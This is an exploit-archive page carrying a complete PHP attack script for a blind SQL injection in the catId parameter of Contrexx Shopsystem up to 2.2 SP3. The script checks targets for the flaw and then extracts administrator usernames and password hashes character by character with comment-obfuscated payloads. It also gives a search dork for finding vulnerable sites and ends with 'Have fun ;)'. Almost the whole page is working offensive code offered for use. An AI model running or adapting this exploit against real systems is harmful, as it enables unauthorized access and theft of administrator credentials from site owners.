[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Contrexx Shopsystem =<2.2 SP3 (catId) Blind SQL Injection
# Published : 2011-08-17
# Author :
# Previous Title : WordPress IP-Logger Plugin <= 3.0 SQL Injection Vulnerability
# Next Title : JCE Joomla Extension <=2.0.10 Multiple Vulnerabilities
#!/usr/bin/php
<?php
/*
Exploit title: Contrexx Shopsystem Blind SQL Injection Exploit
Exploit written by: Penguin
Exploit: index.php?section=shop&catId=[VALID categoryid] and [YOUR BLIND SQL CODE]
Exploit tested on: Debian 6, Ubuntu Linux 11.04
Software price: abount 700 CHF
Vendor: http://www.contrexx.com
Found by: Penguin
Version: =< 2.2 SP 3
Dork: inurl:index.php?section=shop&catId=
Vendor: www.contrexx.com
Visit: www.null-sector.info
Greets to: Blacktiger/Luxy, ErrorX, hAgBaRd2ooo, KrimiX, zYiix, reutz/head
*/
echo "#######################################rn";
echo "# Contrexx Shopsystem Exploit #rn";
echo "# Exploit Type: Blind SQL Injection #rn";
echo "# Programmed by: Penguin #rn";
echo "# Visit www.null-sector.info #rn";
echo "#######################################rn";
if($argc < 4)
{
echo "Usage: ./exploit.php [TARGET_URL] [CATID] (Admin User Limit)rn";
echo "TARGET_URL = http://demo.de/index.phprn";
echo "CATID = CategoryId (MUST BE VALID!)rn";
echo "Admin User Limit = Limit x,0 @ Selecting! Standard: 0rn";
die();
}
// Config Variables
$target_url = $argv[1] . "?section=shop&catId=" . $argv[2];
$charset_start_usr = 33;
$charset_end_usr = 126;
$charset_hash = Array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
$toLength = 100;
//Functions
function getUsername($toLength, $charset_start, $charset_end, $target_url,$limit)
{
$username = "";
// Get Length
$length = -1;
for($i=0;$i<$toLength;$i++)
{
$url = $target_url . "/**/and/**/(select/**/length(username)/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1)=" . $i;
$src = file_get_contents($url);
if(testIt($src) == true)
{
$length = $i;
break;
}
}
if ($length == -1)
{
die("There was a problem @ fetching username length :(rn");
}
echo "Username length: $length !rn";
$username = "";
echo "Username: ";
for($k=0;$k<$length;$k++)
{
$charToAdd = "";
for($c=$charset_start;$c<$charset_end;$c++)
{
$p = $k+1;
$src = file_get_contents($target_url . "/**/and/**/substring((select/**/username/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1),$p,1)=char($c)");
if(testIt($src) == true)
{
$charToAdd = $c;
break;
}
}
echo chr($c);
$username .= chr($c);
}
echo "rn";
return $username;
}
function getHash($toLength, $charset, $target_url,$limit)
{
// Get Hash
$hash = "";
echo "Hash: ";
for($k=0;$k<32;$k++)
{
$charToAdd = "";
for($c=0;$c<count($charset);$c++)
{
$p = $k+1;
$z = $charset[$c];
$src = file_get_contents($target_url . "/**/and/**/substring((select/**/password/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1),$p,1)=char($z)");
file_put_contents("test.html",$src);
if(testIt($src) == true)
{
$charToAdd = $charset[$c];
break;
}
}
echo chr($charToAdd);
$hash .= chr($charToAdd);
}
echo "rn";
return $hash;
}
function testIt($src)
{
$check = explode("<div class="description">",$src);
if(count($check) >= 2)
{
return true;
}
return false;
}
echo "Starting exploit....rnChecking if Vulnerable...";
$check = file_get_contents($target_url . "'");
if(testIt($check) == true)
{
die("Target is not Vulnerable :(rn");
}
$myLimit = $argv[3];
echo "Target is Vulnerable :)rn";
echo "Starting the SQL Injection...rn";
echo "Fetching Username...rn";
$username = getUsername($toLength, $charset_start_usr, $charset_end_usr, $target_url,$myLimit);
$hash = getHash($toLength,$charset_hash,$target_url,$myLimit);
echo "Exploited Successfully!rn";
echo "Full Logindata: $username : $hashrn";
echo "Have fun ;)rn";
?>